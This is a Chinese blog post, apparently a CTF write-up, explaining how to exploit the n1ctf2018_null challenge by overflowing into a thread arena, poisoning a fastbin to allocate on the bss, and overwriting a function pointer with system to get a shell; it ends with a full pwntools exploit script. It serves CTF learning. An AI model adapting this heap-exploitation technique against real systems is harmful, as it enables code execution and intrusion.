n1ctf2018_null(通过劫持线程arena达到任意地址分配)

最新推荐文章于 2023-10-27 22:21:21 发布
最新推荐文章于 2023-10-27 22:21:21 发布
阅读量2.4k 收藏 10
点赞数 3
分类专栏: pwn 二进制漏洞 CTF 文章标签: 安全 PWN CTF 二进制漏洞 缓冲区溢出
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/seaaseesa/article/details/107597557
版权
pwn 同时被 3 个专栏收录
161 篇文章 24 订阅
订阅专栏
二进制漏洞
161 篇文章 9 订阅
订阅专栏
CTF
161 篇文章 9 订阅
订阅专栏

n1ctf2018_null(通过劫持线程arena达到任意地址分配)

首先,检查一下程序的保护机制

然后,我们用IDA分析一下,主函数启动了一个线程

在线程里,是一个循环

其中输入函数存在溢出,由于a2没有更新,因此,如果将数据分成2部分读入的话,第二次,仍然可以读入a2个数据,从而溢出。

溢出尺寸比较大,如果能够覆盖到线程arena,那么就能将fake_chunk链接到fastbin,进而分配过去。但是arena是先mmap出来的,heap是过后才分配出来,因此,线程heap的地址比arena的地址要高。为了能够让heap地址处在arena前方,我们得先耗尽当前的heap空间,这样系统就可以重新mmap一块新内存,就可能会出现在arena前方。

首先,查看一下内存映射

我们看看0x7efcec000000处的内容,从链表特征上来看,这是一个线程arena结构,它位于地址较低的地方

我们来看看后方的内容

可见,我们的堆在arena的后方,假如我们耗尽这些堆空间,我们再看看

我们查看一下内容,此处是arena

而它前面是新mmap的heap空间,因此,我们只需要继续malloc,直接正好接近arena,我们溢出,覆盖arena,修改fastbin,将fake_chunk链接上去。

#coding:utf8
from pwn import *

sh = process('./n1ctf2018_null')
#sh = remote('node3.buuoj.cn',26808)
elf = ELF('./n1ctf2018_null')
system_plt = elf.plt['system']
sh.sendlineafter('password:',"i'm ready for challenge")

def add(size,n,content=''):
   sh.sendlineafter('Action:','1')
   sh.sendlineafter('Size:',str(size))
   sh.sendlineafter('Pad blocks:',str(n))
   if content == '':
      sh.sendlineafter('Content? (0/1):','0')
   else:
      sh.sendlineafter('Content? (0/1):','1')
      sh.sendafter('Input:',content)

for i in range(12):
   add(0x4000,1000)

add(0x4000,262,'0'*0x3FF0)
#溢出,修改thread_arena,将bss上的fake_chunk接到fastbin里
payload = '1'*0x50 + p32(0) + p32(3) + 10*p64(0x60201d)
sleep(0.2)
sh.send(payload)

sleep(0.2)
payload = '/bin/sh'.ljust(0xB,'\x00') + p64(system_plt)
payload = payload.ljust(0x60,'b')
add(0x60,0,payload) #申请到bss上,修改函数指针,getshell

sh.interactive()

 

ha1vk
关注
  • 3
    点赞
  • 10
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
黑客编程之线劫持
weixin_42071117的博客
04-25 657
#include <Windows.h> #include <stdio.h> #pragma pack(1) typedef struct _STCode { BYTE PushCode; // push指令码 DWORD DllAddress; // 注入的dll字符串地址 USHORT CallCode; // call指令码 DWORD FuncAddress; // LoadLibrary函数地址 BYTE LoopCode[7]; // 循环指令 }ST
信标对象文件(BOF),用于通过线劫持进行远程进程注入-C/C++开发
05-27
信标对象文件(BOF),用于通过线劫持进行远程进程注入,而不会产生远程线程。 cThreadHijack ___________.__ .______ ___ .__ __ __ ___ \ __ ___ / | | _________ ____ _____ __ | _ / | \ | __ | | __ | ____ ____ | | __ _ / ___ \ | | | | \ _ __ \ _ / __ \\ __ \ / __ /〜\ | | \ __ \ _ / ___ \ | | / / \ \ ___ | | | Y \ | \ / \ ___ / / __ \ _ / / _ / \ Y / | | | / __ \\ \ ___ | <\ ___> ____ | | ___ | / __ | \ ___> ____ / \ ____ | \ ___ | _ / | __ / \ __ | (____ / \ ___> __ | _ \ \ //
【BUU】n1ctf2018_null
weixin_43960998的博客
04-12 493
struct malloc_state { /* Serialize access. */ __libc_lock_define (, mutex); /* Flags (formerly in max_fast). */ int flags; /* Set if the fastbin chunks contain recently inserted free blocks. */ /* Note this is a bool but not all targets su
线劫持技术
weixin_43799752的博客
11-27 932
windows 线劫持
内核中劫持线程注入DLL并隐藏
人生苦短,我用python
04-18 1311
在驱动程序中,您可以通过调用PsSetCreateThreadNotifyRoutine或PsSetLoadImageNotifyRoutine等API来获取进程线程的通知。这时,您可以暂停线程并修改其上下文,以便在恢复时执行您的代码。为了实现这些功能,您需要学习Windows内核编程和驱动开发。在此过程中,您可能需要使用Windows Driver Kit(WDK)和Visual Studio。编写好驱动程序后,您需要在目标系统上加载和卸载它。在劫持线程后,您需要将目标DLL加载到目标进程的内存中。
ctf-tools-linux-master_ctf工具_ctf工具_CTFtools_CTF_Tools_
10-01
CTF常用小工具你值得拥有那个。。。。111
inno_ctf_2018_quals
05-16
InnoCTF 2018资格赛,任务和解决方案 所需的任务文件 按类别 网页 加密货币 竞价排名 TCP反向 重要时间 佩罗维奇克 :cross_mark: 你现在德威吗? 法证 现在接吻 :cross_mark: 点击它! 生日 间谍无处不在 :...
ctf脚本_ctfpy脚本_ctf跑脚本_ctf_ctf脚本密码_
09-30
ctf 密码学 脚本 合集 非常 nice
轩禹CTF_RSA工具3.6.1.zip
最新发布
01-29
CTF常用工具集
CTF神器_ctf
09-23
【标题】:“CTF神器_ctf” 在网络安全领域,CTF(Capture The Flag)是一种流行的竞赛形式,参与者通过解决各种安全挑战来展示他们的技能。在这个压缩包“CTF神器_ctf”中,重点可能指向了一个名为“dirsearch”的...
N1CTF 2023 pwn_n1array
qq_62172019的博客
10-27 206
N1CTF2023 pwn_n1array
堆详述(Heap)_下
个人笔记
06-21 373
HeapHeap Memory Heap Memory malloc /* malloc(size_t n) Returns a pointer to a newly allocated chunk of at least n bytes, or null if no space is available. Additionally, on failure, errno is set to ENOMEM on ANSI C systems. If n is zero, mallo
python(N1CTF) 100详解
gbxiaowang的博客
05-03 2069
N1es.py challenge.py 题中有两个文件,一个是封装好的N1ES.py,另一个是challenge.py,通过调用n1se实现加密操作。 逐步分析其加密生成方式: 1.首先给出了key key=“wxy191iss00000000000cute” 先调用的是string_to_bits函数 o = string_to_bits(self.key) def string_to...
什么是堆漏洞挖掘?堆的glibc实现、Arena(main_arena、thread_arena
董哥的黑板报
07-22 3235
一、什么是堆 在程序运行过程中,堆可以提供动态分配的内存,允许程序申请大小未知的内存 堆其实就是程序虚拟地址空间的一块连续的线性区域,它由低地址向高地址方向增长 我们一般成管理堆的那部分程序为堆管理器 堆管理器处于用户程序与内核中间,主要做以下工作 malloc free 二、堆的历史 Linux早期的堆分配与回收由Doug Lea实现,但它在并行处理多个线程时,会共享进程的堆内存空间...
python(N1CTF)详解
crispr的博客
07-07 2514
python(N1CTF)详解 前言 本来想晚上记录的,但是一看明天高考,想早点起来记录,结果睡到九点多。。。赶紧爬起来记录下这题,这题综合考察了一些,说难最后写exp基本上没改,说不难你得把python全看一遍,加密方式也要了解才能解出来。下面来看看这个题。 正文 题目给了两个python文件,一个是加密的,一个是加密后base64给的密文,这里贴一下: #challenge.py from N1ES import N1ES import base64 key = "wxy191iss0000000000
N1CTF 2023 pwn_Pwnn1canary
qq_62172019的博客
10-26 267
N1CTF 2023 pwn_Pwnn1canary
对一道n1ctf赛题的详细分析
蚁景网安学院
11-26 547
原创稿件征集邮箱:edu@antvsion.comQQ:3200599554黑客极客技术、信息安全热点安全研究分析等安全相关的技术文章稿件通过并发布还能收获200-800元不等的稿酬最近做...
DLL注入 之线劫持
FISH的专栏
04-03 2813
  大家好,我是FISH ,以下代码只是属于思路,都是我自己KEY进去的,有错误很抱歉,我尽量注意,  内容来自Greg hoglund 的> .    给应用程序注入新的代码,最常用的技巧是DLL注入,使用这个方法,可以让远线程加载到你自己设计的DLL. DLL本身的功能可以是挂钩函数,修改目标程序的内存空间,DLL注入是很隐藏,很方便的注入手段,(实际上,该方法很容易被发现,有
ctf Web_php_include
08-28
CTF(Capture The Flag)是一种网络安全竞赛,其中参与者需要解决各种与网络安全相关的问题。"Web_php_include" 是一个问题的提示,暗示了一个与 PHP 文件包含漏洞相关的 CTF 题目。 PHP 文件包含漏洞是一种常见的 Web 安全漏洞,它允许攻击者通过构造恶意请求来包含并执行服务器上的任意文件。攻击者可以利用这个漏洞来读取敏感文件、执行任意代码以及获取服务器权限。 在 CTF 中,解决 "Web_php_include" 题目的步骤通常如下: 1. 探测漏洞点:通过发送不同的请求,观察是否存在 PHP 文件包含漏洞。 2. 利用漏洞点:构造特定的请求,使得服务器执行恶意代码或读取敏感文件。 3. 获取目标:根据题目要求,尝试获取相应的 flag 或其他标识符。 4. 提交答案:将 flag 或其他标识符提交给比赛组织者验证。 请注意,在实际应用开发中,要避免 PHP 文件包含漏洞,可以使用安全的文件包含函数(如 require_once 或 include_once)、限制包含路径、以及对用户输入进行严格过滤和验证等安全措施。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值